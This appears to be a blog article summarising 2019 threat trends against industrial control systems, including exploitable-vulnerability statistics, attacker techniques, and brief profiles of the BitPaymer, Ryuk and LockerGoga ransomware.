The estimated number of published OT vulnerabilities that are actuality exploitable varies. A survey by researchers from Virginia Tech and other research institutes estimating that “5.5% of all 100,000+ vulnerabilities contained in the National Vulnerability Database have been exploited in the wild. Ttp Tactics Techniques and Procedures
The European Union Agency for Cybersecurity (ENISA) claims that “at least 8.65% of vulnerabilities are exploitable… this number is expected to be higher due to zero-day exploits and the incompleteness of the datasets”. It should be noted that this figure refers to both OT and IT vulnerabilities.
Tactics Techniques and Procedures
Many 2019 reports point out a rise in masquerading. This is done, for example, to steal log-on IDs and passwords or find security gaps in programs. In addition, we’ve also observed a rise in the use of SMB protocol exploitation.
According to Crowdstrike’s report, there has been a rise in malware-free attacks. Malware-free attacks are attacks where the initial tactic did not result in a file or file fragment being written to disk, for example attacks where code executes from memory or where stolen credentials are used for remote login using known tools.
“Hands-on-keyboard” techniques have also been on the rise, including command-line interface attacks, PowerShell and credential theft, credential dumping, and account discovery.
The hacking “industry” is transitioning to an outsourced service model. This model includes Ransomware-as-a-service (RaaS) (e.g. LockerGoga that attacked ICS manufacturing facilities), Malware-as-a-service (MaaS), and Download-as-a-Service (DaaS).
Finally, there has been a prolific use of network shell commands, RDP, RATs, Active directory scanners, network protocol vulnerability exploitation, non-secure DNS manipulation (DNS tunneling, Anchoring), and RCE remote code execution.
2019 OT Advisories and Increase in Attacks
All the 2019 reports I have read were unequivocal about the rise of attacks on the ICS sector. Moreover, in a recent survey of OT leaders, 77% of respondents said they had experienced a malware intrusion in the past year, and half experienced between three and ten. Maritime Cyber Security
The Tactics, Techniques and Procedures (TTP’s) aimed at the ICS environment that made the headlines were BitPaymer, Ryuk, and LockerGoga.
BitPaymer – BitPaymer is a Ransomware that collects data such as Active Directory (AD) credentials, private user data and lists of all computers on the network. BitPaymer uses the PowerShell Empire tool for lateral movement in the network.
Ryuk – Ryuk is a ransomware that resembles and is probably somewhat based on BitPaymer. It uses TrickBot modules (e.g. pwgrab) to execute credentials theft, and PowerShell Empire traffic for reconnaissance and lateral movement.
LockerGoga – uses the PsExec (a sys-admin tool) to perform reconnaissance and lateral movement in the network. Since LockerGoga neither gives the victims a chance to recover the files nor specifically asks for payment, it is likely intended to disrupt operations.